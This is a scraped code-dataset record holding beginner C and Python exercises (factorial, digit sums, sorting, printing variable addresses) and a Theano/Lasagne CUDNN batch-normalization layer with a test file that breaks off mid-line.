| 2020-08-02T17:43:14.967222 | 2019-11-19T12:42:46 | 2019-11-19T12:42:46 | 211,451,131 | 9 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5591397881507874,
"alphanum_fraction": 0.5806451439857483,
"avg_line_length": 30,
"blob_id": "33c12f7fb0c9a0e3d54c1c4625ce2e7a1757f1a5",
"content_id": "0922deb853446354292b4e1abc3ec4bb9323c441",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 3,
"path": "/prog16.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "n = int(input(\"Enter the n value :\"))\nsum = (n*(n+1))/2\nprint(\"sum of n numbers :\",int(sum))\n"
},
{
"alpha_fraction": 0.5631067752838135,
"alphanum_fraction": 0.5631067752838135,
"avg_line_length": 19.600000381469727,
"blob_id": "fb1e4420526abd29e8e16d7f55bb67bcb2f7646f",
"content_id": "79f6688250fdd55042217c79cc36d5b98f0306b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 5,
"path": "/prog9.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a = input()\nb = len(a)\nfor i in range(b):\n print(\"address of character\",a[i],\"=\",id(a[i]))\nprint(a)\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 23,
"blob_id": "69607d3f8c296f5df34218ea708d07fd53c745f9",
"content_id": "40284fad012b7878bd2fd9f47abfef1657af46d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/prog8.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "print(\"Hello BITSathy\")\n"
},
{
"alpha_fraction": 0.49609375,
"alphanum_fraction": 0.52734375,
"avg_line_length": 18.69230842590332,
"blob_id": "4ff7879ce9aa665bbe3a489a636bfc7109dda921",
"content_id": "9fdeedaa57a13e64bc8c72b2e7d948fdedcfecfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/prog38.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n int num1,num2,i;\n printf(\"Enter the two numbers : \");\n scanf(\"%d %d\",&num1,&num2);\n printf(\"\\nIntegers between two integers :\");\n for(i=num1+1;i<num2;i++)\n {\n printf(\"\\n%d\",i);\n }\n return 0;\n}\n"
},
{
"alpha_fraction": 0.3896103799343109,
"alphanum_fraction": 0.4318181872367859,
"avg_line_length": 19.53333282470703,
"blob_id": "1b85d33989adf55471941330f945bb7b841f22fc",
"content_id": "f8d4746bb1f896cd51f309d12c740dc5a99553b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 15,
"path": "/prog15.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int i,a[10];\n printf(\"Enter 10 numbers :\");\n for(i=0;i<10;i++)\n {\n printf(\"\\n\");\n scanf(\"%d\",&a[i]);\n if(a[i]==23)\n printf(\"\\n%d this number is 23\",a[i]);\n else\n printf(\"\\n%d this number is not 23\",a[i]);\n }\n}\n"
},
{
"alpha_fraction": 0.37931033968925476,
"alphanum_fraction": 0.39224138855934143,
"avg_line_length": 13.5,
"blob_id": "d3c3161d70dd1b92e56e281e8431ecc2c9e620b7",
"content_id": "c8877e33f2ebcc2d189d498ddd5657df2bb932da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 16,
"path": "/prog17.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int i,n,sum=0;\n scanf(\"%d\",&n);\n int num[n];\n for(i=0;i<n;i++)\n {\n scanf(\"%d\",&num[i]);\n }\n for(i=0;i<n;i++)\n {\n sum=sum+num[i];\n }\n printf(\"\\n%d\",sum);\n}\n"
},
{
"alpha_fraction": 0.4301075339317322,
"alphanum_fraction": 0.4838709533214569,
"avg_line_length": 12.285714149475098,
"blob_id": "eebbc5d650eec1127c1d52517ca7d3d2ee8763a0",
"content_id": "21ee8d57ad3a1eb4adff5b4208d245417c0cfbac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 7,
"path": "/prog1.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main() {\n int a=40,b=80;\n printf(\"%d\",a+b);\n return 0;\n \n}\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.6805555820465088,
"avg_line_length": 27.799999237060547,
"blob_id": "ad6114b0bd5c64da0576783e3755946a25cacec2",
"content_id": "4738035dfe75eba8e29afeef7aa6104018e2a495",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 5,
"path": "/prog38.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num1=int(input(\"Enter the numbers : \"))\nnum2=int(input())\nprint(\"Integers between the two numbers :\")\nfor i in range(num1+1,num2):\n print(i)\n"
},
{
"alpha_fraction": 0.6071428656578064,
"alphanum_fraction": 0.6071428656578064,
"avg_line_length": 24.66666603088379,
"blob_id": "3589333f0c37c5cdc4c9650c9c1281c829e3cd3b",
"content_id": "1115e2918fd48bff932c77893887a5efd34ae0f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 12,
"path": "/prog39.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "n = int(input(\"Enter the size of array :\"))\nprint(\"Enter the elements :\\n\")\narray = []\nfor i in range(n):\n a=int(input())\n array.append(a)\nprint(\"\\nyour elements:\\n\")\nfor i in range(n):\n print(array[i])\nprint(\"\\nAddress :\\n\")\nfor i in range(n):\n print(\"address of the\",array[i],\"=\",id(array[i]))\n"
},
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.6274510025978088,
"avg_line_length": 20.85714340209961,
"blob_id": "d3a2b79453766f7b9f5f63ec6d582075242676b7",
"content_id": "15335d909c3b27c730ffe421cb03a3582b62dc2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 7,
"path": "/prog18.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Enter the number : \"))\nadd=0\nwhile(num!=0):\n reverse=num%10\n num=int(num/10)\n add=add+reverse\nprint(\"Sum of the digits :\",add)\n"
},
{
"alpha_fraction": 0.48404255509376526,
"alphanum_fraction": 0.5319148898124695,
"avg_line_length": 30.33333396911621,
"blob_id": "34cbbbe505d607dc5c647d0e19f3e2ac64c11c0b",
"content_id": "6f70e69a95faf6f10f0ea361194da0d4401c7b70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 6,
"path": "/prog15.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "for i in range(1,11):\n num = int(input(\"\\nEnter the number :\"))\n if num==23:\n print(\"\\n\",num,\" this number is 23\")\n else :\n print(\"\\n\",num,\" this number is not 23\")\n"
},
{
"alpha_fraction": 0.4390243887901306,
"alphanum_fraction": 0.5365853905677795,
"avg_line_length": 19.5,
"blob_id": "7bf011bc3bf67a561e7289b40a68fd521f4c2a3a",
"content_id": "cff6ba85a411b42bdd2310abd566e9b5aa5b509a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 41,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 2,
"path": "/prog6.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "for i in range(1,101):\n print(\"\\n\",i)\n"
},
{
"alpha_fraction": 0.48230087757110596,
"alphanum_fraction": 0.4955752193927765,
"avg_line_length": 16.384614944458008,
"blob_id": "2a4ed5385dd7fd6f8589fed072628991bfcae3e1",
"content_id": "02eba688caca1bd3610f96ce23f70b4924653552",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 226,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 13,
"path": "/prog2.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n int i,num,fact = 1;\n printf(\"Enter the number :\");\n scanf(\"%d\",&num);\n for(i=1;i<=num;i++)\n {\n fact = i*fact;\n }\n printf(\"The factorial is %d\",fact);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5905511975288391,
"alphanum_fraction": 0.6141732335090637,
"avg_line_length": 24.399999618530273,
"blob_id": "570c20d0bf3d949db1470fa8ecb5ccb617c1e54a",
"content_id": "e92011a2f23a20c4d68084cfcaf526e709780f36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/prog2.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Enter the number :\"))\nfact = 1\nfor i in range(1,num + 1):\n fact = fact * i\nprint(\"The factorial is \",fact)\n"
},
{
"alpha_fraction": 0.5227272510528564,
"alphanum_fraction": 0.5340909361839294,
"avg_line_length": 13.333333015441895,
"blob_id": "a8db063b9b5a21576d9b8eb06041bbb003f2c19f",
"content_id": "3e11ce45fd6196a343d9abdb970b114ad339846c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 6,
"path": "/prog8.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nchar main()\n{\n printf(\"Hello BITSathy\");\n return 0;\n}\n\n\n"
},
{
"alpha_fraction": 0.47136563062667847,
"alphanum_fraction": 0.4889867901802063,
"avg_line_length": 15.214285850524902,
"blob_id": "0dd5c98cbf72428b0b17592401ddd82966ed5bd6",
"content_id": "9e4251ddaf2bb2615f5fb2b19d41b0b868b45e70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 14,
"path": "/prog9.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\n#include<string.h>\nvoid main()\n{\n int i,len;\n char a[100];\n gets(a);\n len=strlen(a);\n for(i=0;i!=len;i++)\n {\n printf(\"address of character %c = %p \\n\",a[i],a[i]);\n }\n puts(a);\n}\n"
},
{
"alpha_fraction": 0.3958333432674408,
"alphanum_fraction": 0.42916667461395264,
"avg_line_length": 16.14285659790039,
"blob_id": "56b54f6984575dac76b89009acd02fa6956b30ee",
"content_id": "e3afd1cd973204ca926330283b5fbac0824635b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 14,
"path": "/prog11.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int a[10],i,j;\n for(i=0;i<10;i++)\n {\n scanf(\"%d\",&a[i]);\n }\n printf(\"contant :\\n\\n\");\n for(j=0;j<10;j++)\n {\n printf(\"address of this integer %d = %p\\n\",a[j],a[j]);\n }\n}\n"
},
{
"alpha_fraction": 0.5566037893295288,
"alphanum_fraction": 0.5754716992378235,
"avg_line_length": 14.142857551574707,
"blob_id": "0c4df4128faf8f8f0cf5fe10b84c4d1dca384c1a",
"content_id": "cf7a28bbae4babe7b009eae3938792b82ff0a050",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 7,
"path": "/prog44.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a=[]\nprint(\"Enter the number :\")\nfor i in range(10):\n b=int(input())\n a.append(b)\na.sort()\nprint(a)\n"
},
{
"alpha_fraction": 0.6339869499206543,
"alphanum_fraction": 0.6339869499206543,
"avg_line_length": 24.5,
"blob_id": "47fffa4a52e694f1ca06d9c1ebcca180ee2dc8b2",
"content_id": "839e26f255d59edb535107f3a1cfcddd779e0315",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 6,
"path": "/prog17.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "n=int(input(\"How many numbers want to sum ?\"))\nnum=[]\nfor i in range(n):\n a=int(input())\n num.append(a)\nprint(\"sum of the given numbers\",sum(num))\n"
},
{
"alpha_fraction": 0.40852129459381104,
"alphanum_fraction": 0.4160400927066803,
"avg_line_length": 14.960000038146973,
"blob_id": "e759aeff67819a757930c350deeb2f02c6a523d1",
"content_id": "2bb195d169c950ac5877398d747f4c98d7d777ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/prog39.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int n,i;\n scanf(\"%d\",&n);\n\n int a[n];\n printf(\"Enter the elements:\\n\\n\");\n for(i=0;i<n;i++)\n {\n scanf(\"%d\",&a[i]);\n }\n\n printf(\"\\nyour elements :\\n\\n\");\n for(i=0;i<n;i++)\n {\n printf(\"%d\\n\",a[i]);\n }\n\n printf(\"\\naddress:\\n\\n\");\n for(i=0;i<n;i++)\n {\n printf(\"address of the %d = %p\\n\",a[i],a[i]);\n }\n}\n"
},
{
"alpha_fraction": 0.4844290614128113,
"alphanum_fraction": 0.512110710144043,
"avg_line_length": 18.266666412353516,
"blob_id": "c8e16820e3a3f8a8095171406db110b0f6ecba13",
"content_id": "c3d0655023b0633f7ed85960e5119260b9cecce2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 15,
"path": "/prog18.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n long int num,i,reverse,sum=0;\n printf(\"Enter the number : \");\n scanf(\"%ld\",&num);\n for(i=1;num!=0;i++)\n {\n reverse=num%10;\n num=num/10;\n sum=sum+reverse;\n }\n printf(\"\\nSum of the digits = %ld\",sum);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5317460298538208,
"avg_line_length": 20,
"blob_id": "a09f2956129d3bc911216f926f7651f056d95f81",
"content_id": "b359cddf7061d9c3a7b34d159a175efd0720056f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 6,
"path": "/prog11.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a=[]\nfor i in range(10):\n b=int(input())\n a.append(b)\nfor j in range(10):\n print(\"address of the\",a[j],\"=\",id(a[j]))\n"
},
{
"alpha_fraction": 0.6040816307067871,
"alphanum_fraction": 0.6040816307067871,
"avg_line_length": 26.22222137451172,
"blob_id": "28844451b3ed23c85f3870d8e004b132f98290ff",
"content_id": "955ce64447517a7e5efb1af9f2a4750f4660a322",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 9,
"path": "/prog14.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "x = int(input(\"Enter the number :\"))\ny = int(input(\"Enter the number :\"))\nz = int(input(\"Enter the number :\"))\nif x>y and x>z :\n print(\"Greatest number :\",x)\nelif y>z :\n print(\"Greatest number :\",y)\nelse :\n print(\"Greatest number :\",z)\n"
},
{
"alpha_fraction": 0.6344085931777954,
"alphanum_fraction": 0.6451612710952759,
"avg_line_length": 14.5,
"blob_id": "19acf19618051461f6fe0d0872f14a83dec7c0d2",
"content_id": "d72fe72ec7fedc4a6edcf31891f5faaee6e1af90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 6,
"path": "/prog23.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "string=input()\na=list(string)\nadd=0\nfor i in range(len(a)):\n add=add+ord(a[i])\nprint(add)\n"
},
{
"alpha_fraction": 0.2586604952812195,
"alphanum_fraction": 0.2909930646419525,
"avg_line_length": 15.65384578704834,
"blob_id": "686a50eddcb0a4b2ab7d7c7d26efb971fc6e5a32",
"content_id": "03723925c4ed262b12b88a00eef8c1908f2af601",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 26,
"path": "/prog44.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int i,j,a[10],b;\n for(i=0;i<10;i++)\n {\n scanf(\"%d\",&a[i]);\n }\n for(i=0;i<10;i++)\n {\n for(j=i+1;j<10;j++)\n {\n if (a[i]>=a[j])\n {\n b=a[i];\n a[i]=a[j];\n a[j]=b;\n }\n }\n }\n printf(\"\\nThe ascending order :\\n\");\n for(i=0;i<10;i++)\n {\n printf(\"%d\\n\",a[i]);\n }\n}\n"
},
{
"alpha_fraction": 0.5318182110786438,
"alphanum_fraction": 0.5363636612892151,
"avg_line_length": 21,
"blob_id": "caf86b9873a7db95cc63f41a4b09fa4fe15f22aa",
"content_id": "c18027a4f2288ee89f55efa4a44bc57d071e9b08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 10,
"path": "/prog14.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n int x,y,z,greater;\n printf(\"Enter three numbers :\");\n scanf(\"%d %d %d\",&x,&y,&z);\n greater=(x>y && x>z)?x:(y>z)?y:z;\n printf(\"Greatest number :%d\",greater);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.49504950642585754,
"alphanum_fraction": 0.5247524976730347,
"avg_line_length": 32.66666793823242,
"blob_id": "63c9cb387bff4eb6fa47a6d424fbe2d1aa589abb",
"content_id": "661e2d5897ce580f5b8e186282d7b34f3029f36c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/prog13.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Enter the number :\"))\nfor i in range(1,11):\n print(\"\\n\",i,\" * \",num,\" = \",i*num)\n"
},
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 6.333333492279053,
"blob_id": "c39d5cf6fda6f06e7591ba4e17e5315e264e8879",
"content_id": "2b9470d8a0de5123fcacc2498121a36f13c88271",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 3,
"path": "/prog1.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a=40 \nb=80\nprint(a+b)\n"
},
{
"alpha_fraction": 0.48571428656578064,
"alphanum_fraction": 0.5035714507102966,
"avg_line_length": 16.5,
"blob_id": "56c946387add38ad1d2b23ee5037c34e0dc22548",
"content_id": "480ad77858e854ca9508e00a60e2f16ee784f3d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 16,
"path": "/prog23.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\n#include<string.h>\nvoid main()\n{\n char str[100];\n int a,i,sum=0;\n printf(\"Enter the string :\");\n scanf(\"%s\",&str);\n a=strlen(str);\n for (i=0;i<a;i++)\n {\n sum=sum+str[i];\n }\n printf(\"\\n Sum of hte ascii values = %d\",sum);\n \n}\n"
}
] | 29 |
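Several exercises in this repo lean on the closed form for the sum of the first n integers that prog16.py uses, sum = n(n+1)/2. A quick sanity check of that identity against a brute-force loop (illustrative only, not part of the repo):

```python
# Verify n*(n+1)//2 == 1 + 2 + ... + n for a range of n.
for n in range(1, 1001):
    assert n * (n + 1) // 2 == sum(range(1, n + 1))
print("closed form verified for n = 1..1000")
```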
jureso/BatchNormalizationCUDNN
|
https://github.com/jureso/BatchNormalizationCUDNN
|
5abdaec4bc2ecb6ade72150a53a21001c592946e
|
ca26b39e6db489c47de986dfbed62de27192d936
|
ca045be2119dbe83fae454d7cdb9c8875c9df65f
|
refs/heads/master
| 2021-01-11T00:07:41.218282 | 2016-10-13T00:00:12 | 2016-10-13T00:00:12 | 70,751,488 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.629948616027832,
"alphanum_fraction": 0.6359216570854187,
"avg_line_length": 48.30821990966797,
"blob_id": "0bf098802119e7a408826255ec35a58dc14d5351",
"content_id": "a34eba3578c12470b5d126b1ed13d3d2b4c70b7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7199,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 146,
"path": "/batchnormalization.py",
"repo_name": "jureso/BatchNormalizationCUDNN",
"src_encoding": "UTF-8",
"text": "import theano\nimport theano.tensor as T\nimport lasagne\nfrom lasagne.layers.base import Layer\nfrom lasagne import init\nfrom theano.sandbox.cuda.dnn import dnn_batch_normalization_train, dnn_batch_normalization_test\n\nclass BatchNormLayer(Layer):\n \"\"\"\n batchnormalization.BatchNormLayer(self, incoming, axes='auto', epsilon=1e-4, alpha=0.1,\n beta=init.Constant(0), gamma=init.Constant(1), mean=init.Constant(0), inv_std=init.Constant(1),\n var=init.Constant(1), cudnn = True, beta_trainable=True, gamma_trainable=True, **kwargs)\n\n Batch Normalization implementation using CUDNN\n\n This layer implements batch normalization using CUDNNv5 implementation. of its inputs, following [1]_:\n\n Parameters\n ----------\n incoming : a :class:`Layer` instance or a tuple\n The layer feeding into this layer, or the expected input shape\n axes : 'auto', int or tuple of int\n The axis or axes to normalize over. If ``'auto'`` (the default),\n normalize over all axes except for the second: this will normalize over\n the minibatch dimension for dense layers, and additionally over all\n spatial dimensions for convolutional layers.\n epsilon : scalar\n Small constant :math:`\\\\epsilon` added to the variance before taking\n the square root and dividing by it, to avoid numerical problems\n alpha : scalar\n Coefficient for the exponential moving average of batch-wise means and\n standard deviations computed during training; the closer to one, the\n more it will depend on the last batches seen\n beta : Theano shared variable, expression, numpy array, callable or None\n Initial value, expression or initializer for :math:`\\\\beta`. Must match\n the incoming shape, skipping all axes in `axes`. Set to ``None`` to fix\n it to 0.0 instead of learning it.\n See :func:`lasagne.utils.create_param` for more information.\n gamma : Theano shared variable, expression, numpy array, callable or None\n Initial value, expression or initializer for :math:`\\\\gamma`. Must\n match the incoming shape, skipping all axes in `axes`. Set to ``None``\n to fix it to 1.0 instead of learning it.\n See :func:`lasagne.utils.create_param` for more information.\n mean : Theano shared variable, expression, numpy array, or callable\n Initial value, expression or initializer for :math:`\\\\mu`. Must match\n the incoming shape, skipping all axes in `axes`.\n See :func:`lasagne.utils.create_param` for more information.\n inv_std : Theano shared variable, expression, numpy array, or callable\n Initial value, expression or initializer for :math:`1 / \\\\sqrt{\n \\\\sigma^2 + \\\\epsilon}`. Must match the incoming shape, skipping all\n axes in `axes`.\n See :func:`lasagne.utils.create_param` for more information.\n var : Theano shared variable, expression, numpy array, or callable\n Initial value, expression or initializer for :math:`\\\\sigma^2 `.\n Must match the incoming shape, skipping all axes in `axes`.\n cudnn : boolean\n Determines if we us CUDNN implementation or internal theano implementation\n beta_trainable : boolean\n Determines if parameter beta is fixed during training or if it is updated.\n gamma_trainable : boolean\n Determines if parameter gamma is fixed during training or if it is updated.\n **kwargs\n Any additional keyword arguments are passed to the :class:`Layer`\n superclass.\n Notes\n -----\n In large graphs (e.g. 
ResNets) the compilation using cudnn=True is significantly faster than using cudnn=False.\n\n See also\n --------\n lasagne.layers.BatchNormLayer\n \"\"\"\n\n def __init__(self, incoming, axes='auto', epsilon=1e-4, alpha=0.1,\n beta=init.Constant(0), gamma=init.Constant(1),\n mean=init.Constant(0), inv_std=init.Constant(1), var=init.Constant(1),\n cudnn = True, beta_trainable=True, gamma_trainable=True, **kwargs):\n super(BatchNormLayer, self).__init__(incoming, **kwargs)\n\n assert len(self.input_shape) == 4, \"Current implementation only supports 4D tensors! Input shape: \" + str(self.input_shape)\n assert axes == 'auto', \"Current implementation only support axes='auto'!\"\n\n if axes == 'auto':\n # default: normalize over all but the second axis\n axes = (0,) + tuple(range(2, len(self.input_shape)))\n elif isinstance(axes, int):\n axes = (axes,)\n\n self.axes = axes\n self.epsilon = epsilon\n self.alpha = alpha\n self.cudnn = cudnn\n\n # we manually determine the shape of all parameters (cudnn requires such shapes)\n shape = (1,self.input_shape[1],1,1)\n\n if beta is None:\n self.beta = None\n else:\n self.beta = self.add_param(beta, shape, 'beta',\n trainable=beta_trainable, regularizable=False)\n if gamma is None:\n self.gamma = None\n else:\n self.gamma = self.add_param(gamma, shape, 'gamma',\n trainable=gamma_trainable, regularizable=gamma_trainable)\n\n self.mean = self.add_param(mean, shape, 'mean',\n trainable=False, regularizable=False)\n self.inv_std = self.add_param(inv_std, shape, 'inv_std',\n trainable=False, regularizable=False)\n self.var = self.add_param(var, shape, 'var',\n trainable=False, regularizable=False)\n\n def get_output_for(self, input, deterministic=False, **kwargs):\n\n\n if deterministic is False:\n if self.cudnn:\n out, input_mean, input_inv_std = dnn_batch_normalization_train(input, self.gamma, self.beta, mode='spatial',epsilon=self.epsilon)\n else: # we simulate cudnn BN\n axes = self.axes\n\n input_mean = input.mean(axes, keepdims=True)\n input_var = input.var(axes, keepdims=True)\n input_inv_std = T.inv(T.sqrt(input_var + self.epsilon))\n out = (input - input_mean) * self.gamma * input_inv_std + self.beta\n\n var = input_inv_std ** (-2) - self.epsilon\n\n running_mean = theano.clone(self.mean, share_inputs=False)\n running_inv_std = theano.clone(self.inv_std, share_inputs=False)\n running_var = theano.clone(self.var, share_inputs=False)\n\n running_mean.default_update = ((1 - self.alpha) * running_mean + self.alpha * input_mean)\n running_inv_std.default_update = ((1 - self.alpha) * running_inv_std + self.alpha * input_inv_std)\n running_var.default_update = ((1 - self.alpha) * running_var + self.alpha * var)\n\n out += (0 * running_mean + 0 * running_inv_std + 0 * running_var)\n\n else:\n if self.cudnn:\n out = dnn_batch_normalization_test(input, self.gamma, self.beta, self.mean, self.var, mode='spatial', epsilon=self.epsilon)\n else:\n out = (input - self.mean) * self.gamma * T.sqrt((self.var + self.epsilon))**(-1) + self.beta\n return out\n"
},
{
"alpha_fraction": 0.6288071274757385,
"alphanum_fraction": 0.6656091213226318,
"avg_line_length": 31.83333396911621,
"blob_id": "addfc7cb1794839acbeac86d1960ea3b89dabe0f",
"content_id": "43b4786fc237ef524ebef685023e7043e38592e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1576,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 48,
"path": "/test_batchnormalization.py",
"repo_name": "jureso/BatchNormalizationCUDNN",
"src_encoding": "UTF-8",
"text": "import theano\nimport theano.tensor as T\nimport lasagne\nimport numpy as np\n\ndef simple_network(input_var, use_cudnn = True):\n from lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer\n from batchnormalization import BatchNormLayer\n\n l_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32), input_var=input_var)\n l_conv1 = ConvLayer(l_in, num_filters=16, filter_size=(3, 3), stride=(1, 1), nonlinearity=None,\n pad='same',\n W=lasagne.init.HeNormal(gain='relu'), flip_filters=False, b=None)\n\n l_bn1 = BatchNormLayer(l_conv1, cudnn=use_cudnn)\n l_relu = lasagne.layers.NonlinearityLayer(l_bn1, nonlinearity=lasagne.nonlinearities.rectify)\n return l_relu\n\ndef test_batchnormalization_forward():\n input_var = T.tensor4('inputs')\n\n network = simple_network(input_var)\n\n output = lasagne.layers.get_output(network)\n\n fn = theano.function([input_var], output)\n\n Xin = 